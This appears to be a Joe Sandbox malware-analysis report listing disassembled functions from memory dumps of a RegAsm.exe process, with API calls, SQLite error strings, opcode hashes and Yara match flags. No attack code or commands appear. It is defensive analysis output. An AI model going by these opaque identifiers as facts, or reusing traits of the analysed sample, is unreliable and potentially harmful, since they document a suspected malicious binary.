                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: NEAR$expected integer, got "%.*s"$fts5 expression tree is too large (maximum depth %d)$fts5: syntax error near "%.*s"
                                                                                                                                                                                                • API String ID: 0-2846580575
                                                                                                                                                                                                • Opcode ID: d0bf9b2ce691a0935b13cf38649da6b47293e14b98eb0e89174b1b1357f3efc9
                                                                                                                                                                                                • Instruction ID: 2f38d76bc392e1a9806f669bb1712bed72e678f91138eb1a9bb4e7d5835d7747
                                                                                                                                                                                                • Opcode Fuzzy Hash: d0bf9b2ce691a0935b13cf38649da6b47293e14b98eb0e89174b1b1357f3efc9
                                                                                                                                                                                                • Instruction Fuzzy Hash: 4BC1BFB4908206AFEB219F60CA81FAAF7A9FF48705F04495CF8459B351E371E560CBB1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 00418A00 Relevance: 9.0, APIs: 6, Instructions: 47COMMONLIBRARYCODE
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • __getptd.LIBCMT ref: 00418A0C
                                                                                                                                                                                                  • Part of subcall function 00419364: __getptd_noexit.LIBCMT ref: 00419367
                                                                                                                                                                                                  • Part of subcall function 00419364: __amsg_exit.LIBCMT ref: 00419374
                                                                                                                                                                                                • __amsg_exit.LIBCMT ref: 00418A2C
                                                                                                                                                                                                • __lock.LIBCMT ref: 00418A3C
                                                                                                                                                                                                • InterlockedDecrement.KERNEL32(?), ref: 00418A59
                                                                                                                                                                                                • _free.LIBCMT ref: 00418A6C
                                                                                                                                                                                                • InterlockedIncrement.KERNEL32(0042E1C0), ref: 00418A84
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: Interlocked__amsg_exit$DecrementIncrement__getptd__getptd_noexit__lock_free
                                                                                                                                                                                                • String ID:
                                                                                                                                                                                                • API String ID: 3470314060-0
                                                                                                                                                                                                • Opcode ID: 7bcf2295555902ab092b20074ac8eb7a5b11b88eb553fe5f09bd465897bee5fc
                                                                                                                                                                                                • Instruction ID: 94217c608b42283c6032a388305e1f98177ed79fe345041c0b305e5c649e8a26
                                                                                                                                                                                                • Opcode Fuzzy Hash: 7bcf2295555902ab092b20074ac8eb7a5b11b88eb553fe5f09bd465897bee5fc
                                                                                                                                                                                                • Instruction Fuzzy Hash: E2016132A01A21ABD721AB6698057DE73A0AF04794F48401FF810A7690DF3C6DC2CBDD
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B59ABF0 Relevance: 9.0, APIs: 1, Strings: 4, Instructions: 204COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • unable to delete/modify user-function due to active statements, xrefs: 1B59AD61
                                                                                                                                                                                                • misuse, xrefs: 1B59AE18
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B59AE1D
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B59AE0E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify user-function due to active statements
                                                                                                                                                                                                • API String ID: 0-3864549341
                                                                                                                                                                                                • Opcode ID: 0ae138d884ac1ec2c0e320d2b242494fecb488ffd9753948c803d2a3b12a2b59
                                                                                                                                                                                                • Instruction ID: a91677b9bb422650a84ea6bbe8d1ef70b7db4816029b17eb1bbc92060eb1b261
                                                                                                                                                                                                • Opcode Fuzzy Hash: 0ae138d884ac1ec2c0e320d2b242494fecb488ffd9753948c803d2a3b12a2b59
                                                                                                                                                                                                • Instruction Fuzzy Hash: AE51D272608701AFEB148F24EC80BAFBBF5EFC9755F04492DF58696251E331D8418B62
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B49A230 Relevance: 9.0, APIs: 2, Strings: 3, Instructions: 201COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse
                                                                                                                                                                                                • API String ID: 0-3564305576
                                                                                                                                                                                                • Opcode ID: 04ca3edb700a2a30c4811362fe3df105aaacfb30bb0d14e6d1b12587a0a9e52f
                                                                                                                                                                                                • Instruction ID: 41b52844a0c1ad050ae1933bc516534e7550096df24f3838d1bd5316a3509f75
                                                                                                                                                                                                • Opcode Fuzzy Hash: 04ca3edb700a2a30c4811362fe3df105aaacfb30bb0d14e6d1b12587a0a9e52f
                                                                                                                                                                                                • Instruction Fuzzy Hash: 1671E6706043819FEB20CF24E845BDB7BE4AF89309F04C52CE89987342E775E455CB92
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AA860 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 180COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: argument to %s() is not a valid SQL statement$bytecode$stmt-pointer$tables_used
                                                                                                                                                                                                • API String ID: 0-361449301
                                                                                                                                                                                                • Opcode ID: 4804bdf05f4c97bb6b22c567b89b465e66116af3435eaec5ba2806ee97cb366e
                                                                                                                                                                                                • Instruction ID: c14515cbb7db9074bcd0ac5717765558bc05ee083793fffd592d87f6186c0d60
                                                                                                                                                                                                • Opcode Fuzzy Hash: 4804bdf05f4c97bb6b22c567b89b465e66116af3435eaec5ba2806ee97cb366e
                                                                                                                                                                                                • Instruction Fuzzy Hash: 9961B0B15007429FEB148F34D885B96B7F8AF64314F058D2DE897C6241E776E94CCBA1
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B5BBF00 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 156COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: NEAR$fts5 expression tree is too large (maximum depth %d)$fts5: %s queries are not supported (detail!=full)$phrase
                                                                                                                                                                                                • API String ID: 0-593389478
                                                                                                                                                                                                • Opcode ID: f257b46eb8141f0e6c82e635d933f9ba07262f3e8b75d2be996c3fbd2148f551
                                                                                                                                                                                                • Instruction ID: ee6538ada1977533bb9f12c00dae7da5159f08d387362633424d04b5dc2164b7
                                                                                                                                                                                                • Opcode Fuzzy Hash: f257b46eb8141f0e6c82e635d933f9ba07262f3e8b75d2be996c3fbd2148f551
                                                                                                                                                                                                • Instruction Fuzzy Hash: CF41F771A002459FFB25CF14DA80BEEB3A6EF84314F11456DF8468B211E7B5EC85CB95
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C23D0 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 150COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: cannot detach database %s$database %s is locked$main$no such database: %s
                                                                                                                                                                                                • API String ID: 0-3838832555
                                                                                                                                                                                                • Opcode ID: e36ae95eaa9055c1fce3513a16641085db3a1f4862105aa551c6fa0b23770fe0
                                                                                                                                                                                                • Instruction ID: 53338d2499f35d000744a8bf3cafd9f56484b96acb3d070ef9fdfdabca2fa834
                                                                                                                                                                                                • Opcode Fuzzy Hash: e36ae95eaa9055c1fce3513a16641085db3a1f4862105aa551c6fa0b23770fe0
                                                                                                                                                                                                • Instruction Fuzzy Hash: C151E2B9A002219FEB14CF14D890B97B7A5BF98B14F11C55DE8988B391DB71E841CBA2
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4DF490 Relevance: 8.9, APIs: 1, Strings: 4, Instructions: 143COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • misuse, xrefs: 1B4DF4BA
                                                                                                                                                                                                • %s at line %d of [%.10s], xrefs: 1B4DF4BF
                                                                                                                                                                                                • ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f, xrefs: 1B4DF4B0
                                                                                                                                                                                                • unable to delete/modify collation sequence due to active statements, xrefs: 1B4DF533
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %s at line %d of [%.10s]$ebead0e7230cd33bcec9f95d2183069565b9e709bf745c9b5db65cc0cbf92c0f$misuse$unable to delete/modify collation sequence due to active statements
                                                                                                                                                                                                • API String ID: 0-3348720253
                                                                                                                                                                                                • Opcode ID: 5fb82566de6640cfb5d93d6e56e32137ecf3df1e4bdb5b922e3ead2d95becf17
                                                                                                                                                                                                • Instruction ID: 2afc4a3b81f5c3dae25ec00bb60ff291ebf531f348e1932ee4d38e2546473441
                                                                                                                                                                                                • Opcode Fuzzy Hash: 5fb82566de6640cfb5d93d6e56e32137ecf3df1e4bdb5b922e3ead2d95becf17
                                                                                                                                                                                                • Instruction Fuzzy Hash: FB416B726003009BD710AF24ECA0BEAB7E4EF9132AF14856EF5948B382D336F515C761
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4C4C00 Relevance: 8.9, APIs: 2, Strings: 3, Instructions: 143COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                • CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN), xrefs: 1B4C4CCB
                                                                                                                                                                                                • invalid arguments to fts4aux constructor, xrefs: 1B4C4C9E
                                                                                                                                                                                                • temp, xrefs: 1B4C4C3E
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: CREATE TABLE x(term, col, documents, occurrences, languageid HIDDEN)$invalid arguments to fts4aux constructor$temp
                                                                                                                                                                                                • API String ID: 0-537686372
                                                                                                                                                                                                • Opcode ID: 854c99df383dd82bc05638654dba62310202b7aee12d3785a1452641acb951fe
                                                                                                                                                                                                • Instruction ID: cfb3bffb579b7f6fdb27e4495208eb39e40c7117f2624759d4b86e96fb5915a1
                                                                                                                                                                                                • Opcode Fuzzy Hash: 854c99df383dd82bc05638654dba62310202b7aee12d3785a1452641acb951fe
                                                                                                                                                                                                • Instruction Fuzzy Hash: C941277A5042459FCB148F68D980AEB7FF5EF55224F15C4ADECD58B312D632E902CB60
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 1B4AC2B0 Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 112COMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2885733857.000000001B498000.00000020.00001000.00020000.00000000.sdmp, Offset: 1B490000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2885708310.000000001B490000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B491000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B5F6000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2885733857.000000001B69D000.00000020.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B69F000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886538230.000000001B6A8000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886631004.000000001B6D2000.00000004.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DA000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DD000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2886655892.000000001B6DF000.00000002.00001000.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_1b490000_RegAsm.jbxd
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID:
                                                                                                                                                                                                • String ID: %!.*f
                                                                                                                                                                                                • API String ID: 0-786758813
                                                                                                                                                                                                • Opcode ID: b9372379c573337f71063faf650d93bd594670989937b63b6869561980e45337
                                                                                                                                                                                                • Instruction ID: 770455d6a373f2b8ab21ac53403a40a5a8022ba19bc1f6cd77faef554b8c0057
                                                                                                                                                                                                • Opcode Fuzzy Hash: b9372379c573337f71063faf650d93bd594670989937b63b6869561980e45337
                                                                                                                                                                                                • Instruction Fuzzy Hash: 25314F36C04A2186DB46AB38DC133DB77A46FA6291F04C359E8976A103EB359897C3D6
                                                                                                                                                                                                Uniqueness

                                                                                                                                                                                                Uniqueness Score: -1.00%

                                                                                                                                                                                                Function 004063FD Relevance: 8.9, APIs: 4, Strings: 1, Instructions: 103memoryCOMMON
                                                                                                                                                                                                Download Yara Rule
                                                                                                                                                                                                APIs
                                                                                                                                                                                                • _EH_prolog.MSVCRT ref: 00406402
                                                                                                                                                                                                • memcmp.MSVCRT ref: 00406428
                                                                                                                                                                                                • memset.MSVCRT ref: 00406457
                                                                                                                                                                                                • LocalAlloc.KERNEL32(00000040,?,?,?,?,?,00000000,00000000), ref: 0040648C
                                                                                                                                                                                                  • Part of subcall function 0040E912: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E93C
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrlenA.KERNEL32(?,00000000,?,00415A25,004254FF,004254FE,00000000,00000000,?,004162DD), ref: 0040E98F
                                                                                                                                                                                                  • Part of subcall function 0040E986: lstrcpy.KERNEL32(00000000,00000000), ref: 0040E9C3
                                                                                                                                                                                                  • Part of subcall function 0040E949: lstrcpy.KERNEL32(00000000,FEE8858D), ref: 0040E96F
                                                                                                                                                                                                Strings
                                                                                                                                                                                                Memory Dump Source
                                                                                                                                                                                                • Source File: 00000001.00000002.2880201060.0000000000400000.00000040.00000400.00020000.00000000.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000434000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000438000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000043C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052C000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000052F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000535000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.0000000000573000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000060D000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                • Associated: 00000001.00000002.2880201060.000000000063F000.00000040.00000400.00020000.00000000.sdmpDownload File
                                                                                                                                                                                                Joe Sandbox IDA Plugin
                                                                                                                                                                                                • Snapshot File: hcaresult_1_2_400000_RegAsm.jbxd
                                                                                                                                                                                                Yara matches
                                                                                                                                                                                                Similarity
                                                                                                                                                                                                • API ID: lstrcpy$AllocH_prologLocallstrlenmemcmpmemset
                                                                                                                                                                                                • String ID: v10
                                                                                                                                                                                                • API String ID: 2733184300-1337588462
                                                                                                                                                                                                • Opcode ID: a10310a5beb8e6b2362bc1ef26a1ee171380ee08742ace6ef0a7a288a273b569
                                                                                                                                                                                                • Instruction ID: 31f1892578ae71bd533c688e9055ca7098b3e9a2a139d2734b5ae6b748e23c41
